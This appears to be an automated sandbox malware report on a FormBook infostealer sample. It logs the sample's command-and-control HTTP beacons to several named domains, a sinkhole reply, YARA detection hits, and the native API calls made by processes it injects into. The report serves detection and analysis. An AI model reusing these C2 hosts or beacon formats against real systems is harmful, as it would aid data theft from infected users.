Source: global traffic | HTTP traffic detected: GET /csv8/?t8o8sPp=iJ9LMG7MliwQjz4N9h8Hq4mQMyMQ8EbCXmiUEypb7zSuax6avA4zdFyQt2cMJ86uh/oE&jBZd=KnhT HTTP/1.1 | Host: www.epicmassiveconcepts.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /csv8/?t8o8sPp=/WWabBMDJNFcoLaqfnEbo6hmuOxaPIPf4Swj3PCSZ12YB4sttwIxqUCSSH4NA1N37R36&jBZd=KnhT HTTP/1.1 | Host: www.exit-divorce.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /csv8/?t8o8sPp=UyqXkzQbKyztPGX66qxwvXap1LDI1TOmYI1OusxlxwN3fVBnLta3wXT2zIL/xRkQBU5V&jBZd=KnhT HTTP/1.1 | Host: www.splendidhotelspa.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /csv8/?t8o8sPp=jG588BPFN24GA+JnJbzwJpIoc208xnuoJDpFE+MGYeEjWt0JePkAwfwipDNVrrzBFNJV&jBZd=KnhT HTTP/1.1 | Host: www.stnanguo.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /csv8/?t8o8sPp=qrM/jq4OcB9vG2RwEV9Oj1wgtu+jolIiSW/njvsFRiZ9j79vyWJq+CFtdr2TsRW1k8yh&jBZd=KnhT HTTP/1.1 | Host: www.alparmuhendislik.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /csv8/?t8o8sPp=f1zFyjNxEhLridJwdKKCz7YQnzvARTiViSvHXssl+N40gmlvXkDdEguhFCZDVR0rFwZR&jBZd=KnhT HTTP/1.1 | Host: www.soundon.events | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /csv8/?t8o8sPp=EQmgoSYDEa5LDPvVC5k82JbrO8g/Lv/s9cEF36fL7P4v8Aj5jRO5aZQhqVXoXMO5wnpv&jBZd=KnhT HTTP/1.1 | Host: www.travelnetafrica.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /csv8/?t8o8sPp=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+b4dsCsJZjty&jBZd=KnhT HTTP/1.1 | Host: www.fessusesefsee.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /csv8/?t8o8sPp=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvOR5OTN0YiqA&jBZd=KnhT HTTP/1.1 | Host: www.queensboutique1000.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 45.77.226.209 | 45.77.226.209
Source: Joe Sandbox View | ASN Name: AUTOMATTICUS | AUTOMATTICUS
Source: Joe Sandbox View | ASN Name: AS-CHOOPAUS | AS-CHOOPAUS
Source: Joe Sandbox View | ASN Name: OVHFR | OVHFR
Source: global traffic | HTTP traffic detected: GET /csv8/?t8o8sPp=qn4X4+yxbbSsDYaEiiQ2PWd8LlsUN5GHqTXva27qpzu+WFndrUbREk96g9Cvik6UddJD&jBZd=KnhT HTTP/1.1 | Host: www.studentdividers.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /csv8/?t8o8sPp=ZwKj9ShwklggAmvMfF0it6gA0E2+kz8+Lfh+752BzZBDlYhxiYZDgoXg2IqvscIWEsaZ&jBZd=KnhT HTTP/1.1 | Host: www.logansshop.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: unknown | DNS traffic detected: queries for: www.herbmedia.net
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 13 Jan 2021 20:16:25 GMT | Server: X-SinkHole: Malware DNS SinkHole Server | Content-Length: 307 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /csv8/ was not found on this server.</p><hr><address>X-SinkHole: Malware DNS SinkHole Server Server at www.fessusesefsee.com Port 80</address></body></html>
Source: explorer.exe, 00000006.00000003.291409665.00000000089DC000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000006.00000000.264819810.000000000F440000.00000004.00000001.sdmp | String found in binary or memory: http://logo.verisign
Source: J0OmHIagw8.exe, 00000000.00000002.238745092.0000000003261000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_004181C0 NtCreateFile | 5_2_004181C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_00418270 NtReadFile | 5_2_00418270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_004182F0 NtClose | 5_2_004182F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_004183A0 NtAllocateVirtualMemory | 5_2_004183A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_004181BA NtCreateFile | 5_2_004181BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0041826A NtReadFile | 5_2_0041826A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409540 NtReadFile, LdrInitializeThunk | 5_2_05409540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_054095D0 NtClose, LdrInitializeThunk | 5_2_054095D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409710 NtQueryInformationToken, LdrInitializeThunk | 5_2_05409710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409FE0 NtCreateMutant, LdrInitializeThunk | 5_2_05409FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409780 NtMapViewOfSection, LdrInitializeThunk | 5_2_05409780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_054097A0 NtUnmapViewOfSection, LdrInitializeThunk | 5_2_054097A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409660 NtAllocateVirtualMemory, LdrInitializeThunk | 5_2_05409660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_054096E0 NtFreeVirtualMemory, LdrInitializeThunk | 5_2_054096E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409910 NtAdjustPrivilegesToken, LdrInitializeThunk | 5_2_05409910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_054099A0 NtCreateSection, LdrInitializeThunk | 5_2_054099A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409840 NtDelayExecution, LdrInitializeThunk | 5_2_05409840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409860 NtQuerySystemInformation, LdrInitializeThunk | 5_2_05409860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_054098F0 NtReadVirtualMemory, LdrInitializeThunk | 5_2_054098F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409A50 NtCreateFile, LdrInitializeThunk | 5_2_05409A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409A00 NtProtectVirtualMemory, LdrInitializeThunk | 5_2_05409A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409A20 NtResumeThread, LdrInitializeThunk | 5_2_05409A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409560 NtWriteFile | 5_2_05409560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409520 NtWaitForSingleObject | 5_2_05409520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0540AD30 NtSetContextThread | 5_2_0540AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_054095F0 NtQueryInformationFile | 5_2_054095F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409760 NtOpenProcess | 5_2_05409760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409770 NtSetInformationFile | 5_2_05409770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0540A770 NtOpenThread | 5_2_0540A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0540A710 NtOpenProcessToken | 5_2_0540A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409730 NtQueryVirtualMemory | 5_2_05409730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409650 NtQueryValueKey | 5_2_05409650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409670 NtQueryInformationProcess | 5_2_05409670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409610 NtEnumerateValueKey | 5_2_05409610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_054096D0 NtCreateKey | 5_2_054096D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409950 NtQueueApcThread | 5_2_05409950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_054099D0 NtCreateProcessEx | 5_2_054099D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0540B040 NtSuspendThread | 5_2_0540B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409820 NtEnumerateKey | 5_2_05409820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_054098A0 NtWriteVirtualMemory | 5_2_054098A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409B00 NtSetValueKey | 5_2_05409B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0540A3B0 NtGetContextThread | 5_2_0540A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409A10 NtQuerySection | 5_2_05409A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05409A80 NtOpenDirectoryObject | 5_2_05409A80
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E595D0 NtClose, LdrInitializeThunk | 8_2_04E595D0
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59540 NtReadFile, LdrInitializeThunk | 8_2_04E59540
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E596E0 NtFreeVirtualMemory, LdrInitializeThunk | 8_2_04E596E0
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E596D0 NtCreateKey, LdrInitializeThunk | 8_2_04E596D0
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59660 NtAllocateVirtualMemory, LdrInitializeThunk | 8_2_04E59660
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59650 NtQueryValueKey, LdrInitializeThunk | 8_2_04E59650
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59FE0 NtCreateMutant, LdrInitializeThunk | 8_2_04E59FE0
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59780 NtMapViewOfSection, LdrInitializeThunk | 8_2_04E59780
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59710 NtQueryInformationToken, LdrInitializeThunk | 8_2_04E59710
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59860 NtQuerySystemInformation, LdrInitializeThunk | 8_2_04E59860
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59840 NtDelayExecution, LdrInitializeThunk | 8_2_04E59840
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E599A0 NtCreateSection, LdrInitializeThunk | 8_2_04E599A0
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59910 NtAdjustPrivilegesToken, LdrInitializeThunk | 8_2_04E59910
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59A50 NtCreateFile, LdrInitializeThunk | 8_2_04E59A50
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E595F0 NtQueryInformationFile | 8_2_04E595F0
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59560 NtWriteFile | 8_2_04E59560
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59520 NtWaitForSingleObject | 8_2_04E59520
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E5AD30 NtSetContextThread | 8_2_04E5AD30
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59670 NtQueryInformationProcess | 8_2_04E59670
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59610 NtEnumerateValueKey | 8_2_04E59610
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E597A0 NtUnmapViewOfSection | 8_2_04E597A0
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59760 NtOpenProcess | 8_2_04E59760
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E5A770 NtOpenThread | 8_2_04E5A770
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59770 NtSetInformationFile | 8_2_04E59770
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59730 NtQueryVirtualMemory | 8_2_04E59730
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E5A710 NtOpenProcessToken | 8_2_04E5A710
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E598F0 NtReadVirtualMemory | 8_2_04E598F0
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E598A0 NtWriteVirtualMemory | 8_2_04E598A0
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E5B040 NtSuspendThread | 8_2_04E5B040
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59820 NtEnumerateKey | 8_2_04E59820
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E599D0 NtCreateProcessEx | 8_2_04E599D0
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59950 NtQueueApcThread | 8_2_04E59950
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59A80 NtOpenDirectoryObject | 8_2_04E59A80
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59A20 NtResumeThread | 8_2_04E59A20
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59A00 NtProtectVirtualMemory | 8_2_04E59A00
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59A10 NtQuerySection | 8_2_04E59A10
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E5A3B0 NtGetContextThread | 8_2_04E5A3B0
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E59B00 NtSetValueKey | 8_2_04E59B00
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_031083A0 NtAllocateVirtualMemory | 8_2_031083A0
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_03108270 NtReadFile | 8_2_03108270
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_031082F0 NtClose | 8_2_031082F0
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_031081C0 NtCreateFile | 8_2_031081C0
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_0310826A NtReadFile | 8_2_0310826A
Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_031081BA NtCreateFile | 8_2_031081BA
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeCode function: 0_2_00E58D5D0_2_00E58D5D
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeCode function: 0_2_0303CAE40_2_0303CAE4
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeCode function: 0_2_0303EEA20_2_0303EEA2
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeCode function: 0_2_0303EEB00_2_0303EEB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_004010305_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041B8A35_2_0041B8A3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041C23F5_2_0041C23F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041C2AF5_2_0041C2AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041C3DF5_2_0041C3DF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_00408C605_2_00408C60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041CC135_2_0041CC13
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041B4A35_2_0041B4A3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_00402D905_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041BD9B5_2_0041BD9B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041BE605_2_0041BE60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041C6035_2_0041C603
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_00402FB05_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C0D205_2_053C0D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05491D555_2_05491D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05492D075_2_05492D07
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054925DD5_2_054925DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F25815_2_053F2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053DD5E05_2_053DD5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D841F5_2_053D841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0548D4665_2_0548D466
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0549DFCE5_2_0549DFCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05491FF15_2_05491FF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053E6E305_2_053E6E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0548D6165_2_0548D616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05492EF75_2_05492EF7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053E41205_2_053E4120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053CF9005_2_053CF900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054810025_2_05481002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0549E8245_2_0549E824
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F20A05_2_053F20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054928EC5_2_054928EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053DB0905_2_053DB090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_054920A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05492B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_053FEBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_054803DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0548DBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_054922AE
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EDD466
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E2841F
